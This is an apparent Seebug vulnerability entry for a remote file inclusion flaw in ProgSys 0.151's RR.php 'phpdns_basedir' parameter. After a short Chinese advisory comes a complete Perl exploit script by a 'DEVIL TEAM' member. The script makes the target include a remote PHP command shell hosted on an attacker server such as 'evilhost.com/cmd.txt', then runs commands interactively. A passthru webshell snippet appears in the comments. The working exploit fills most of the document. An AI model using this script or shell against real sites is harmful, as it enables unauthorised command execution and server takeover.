ProgSys RR.PHP远程文件包含漏洞

2006-12-24T00:00:00
ID SSV:1018
Type seebug
Reporter Root
Modified 2006-12-24T00:00:00

Description

ProgSys是一款基于PHP的web管理程序。 ProgSys不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于’RR.PHP'脚本对用户提交的‘phpdns_basedir'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。

Bosch IT-Consulting ProgSys 0.151 目前没有解决方案提供,请关注以下链接: <a href="http://www.boesch-it.de/sw/progsys.php?lang=en" target="_blank">http://www.boesch-it.de/sw/progsys.php?lang=en</a>

                                        
                                            
                                                #!/usr/bin/perl

use LWP::UserAgent;

#:::::::::  :::::::::: :::     ::: ::::::::::: :::        
#:+:    :+: :+:        :+:     :+:     :+:     :+:        
#+:+    +:+ +:+        +:+     +:+     +:+     +:+        
#+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+        
#+#+    +#+ +#+         +#+   +#+      +#+     +#+        
#+#    #+# #+#          #+#+#+#       #+#     #+#        
#########  ##########     ###     ########### ########## 
#::::::::::: ::::::::::     :::     ::::    ::::  
#    :+:     :+:          :+: :+:   +:+:+: :+:+:+ 
#    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+ 
#    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+ 
#    +#+     +#+        +#+     +#+ +#+       +#+ 
#    #+#     #+#        #+#     #+# #+#       #+# 
#    ###     ########## ###     ### ###       ### 
#	
#	
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- ProgSys &lt;= 0.151 Remote File Include Exploit
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- [Script name: ProgSys v.0.151
#- [Script site: http://www.boesch-it.de/sw/progsys.php?lang=en
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-          Find by: Kacper (a.k.a Rahim)
#+
#-    DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
#+
#-          Contact: kacper1964@yahoo.pl
#-                        or
#-           http://www.rahim.webd.pl/
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Special Greetz: DragonHeart ;-)
#- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
#-                 SkD, nukedclx, Ramzes
#-
#- Greetz for all users DEVIL TEAM IRC Channel !!
#!@ Przyjazni nie da sie zamienic na marne korzysci @!
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-            Z Dedykacja dla osoby,
#-         bez ktorej nie mogl bym zyc...
#-           K.C:* J.M (a.k.a Magaja)
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&quot;;
# usage:
# perl exploit.pl &lt;ProgSys Locaction&gt; &lt;shell location&gt; &lt;shell cmd&gt;
#
# perl exploit.pl http://site.com/[ProgSys_Path]/ 
http://site.com/cmd.txt cmd
#
# cmd shell example: &lt;?passthru($_GET[cmd]);?&gt;
#
# cmd shell variable: ($_GET[cmd]);
###################################################




$sciezka = $ARGV[0];

$sciezkacmd = $ARGV[1];

$komenda = $ARGV[2];

if($sciezka!~/http:\/\// || $sciezkacmd!~/http:\/\// || 
!$komenda){usage()}

head();

while()
{
print &quot;[shell] \$&quot;;
while(&lt;STDIN&gt;)
{
$cmd=$_;
chomp($cmd);

$xpl = LWP::UserAgent-&gt;new() or die;

$req = 
HTTP::Request-&gt;new(GET=&gt;$sciezka.'includes/pear/Net/DNS/RR.php?phpdns_basedir='.$sciezkacmd.'?&amp;'.$komenda.'='.$cmd)or 
die &quot;\nCouldNot connect\n&quot;;
$res = $xpl-&gt;request($req);

$return = $res-&gt;content;
$return =~ tr/[\n]/[&amp;#234;]/;

if (!$cmd) {print &quot;\nEnter a Command\n\n&quot;; $return =&quot;&quot;;}

elsif ($return =~/failed to open stream: HTTP request failed!/ || 
$return =~/: Cannot executea blank command in &lt;b&gt;/)

{print &quot;\nCould Not Connect to cmd Host or Invalid Command 
Variable\n&quot;;exit}

elsif ($return =~/^&lt;br.\/&gt;.&lt;b&gt;Warning/) {print &quot;\nInvalid Command\n\n&quot;}

if($return =~ /(.+)&lt;br.\/&gt;.&lt;b&gt;Warning.(.+)&lt;br.\/&gt;.&lt;b&gt;Warning/)
{

$finreturn = $1;
$finreturn=~ tr/[&amp;#234;]/[\n]/;
print &quot;\r\n$finreturn\n\r&quot;;
last;


}
else {print &quot;[shell] \$&quot;;}}}last;

sub head()
{
print 
&quot;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n&quot;;
print &quot;+          - - [DEVIL TEAM THE BEST POLISH TEAM] - -         
+\n&quot;;
print &quot;+          ProgSys &lt;= 0.151 Remote File Include Exploit      
+\n&quot;;
print &quot;+                http://www.rahim.webd.pl/                   
+\n&quot;;
print &quot;+          DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam        
+\n&quot;;
print &quot;+                Find by: Kacper (a.k.a Rahim)               
+\n&quot;;
print 
&quot;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n&quot;;
}
sub usage()
{
head();
print &quot; Usage: perl exploit.pl &lt;ProgSys Locaction&gt; &lt;shell location&gt; 
&lt;shell cmd&gt;\r\n\n&quot;;
print &quot; &lt;ProgSys Locaction&gt; - Full path to ProgSys ex: 
http://www.site.com/ProgSys/\r\n&quot;;
print &quot; &lt;shell location&gt; - Path to cmd Shell e.g 
http://www.evilhost.com/cmd.txt\r\n&quot;;
print &quot; &lt;shell cmd&gt; - Command variable used in php shell \r\n&quot;;
print &quot; 
============================================================================\r\n&quot;;
print &quot;                         Find by: Kacper (a.k.a Rahim)                       
\r\n&quot;;
print &quot;                           http://www.rahim.webd.pl/                         
\r\n&quot;;
print &quot;                    DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam               
\r\n&quot;;
print &quot;                          Special Greetz: DragonHeart ;-)                    
\r\n&quot;;
print &quot; 
============================================================================\r\n&quot;;

exit();
}

#DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam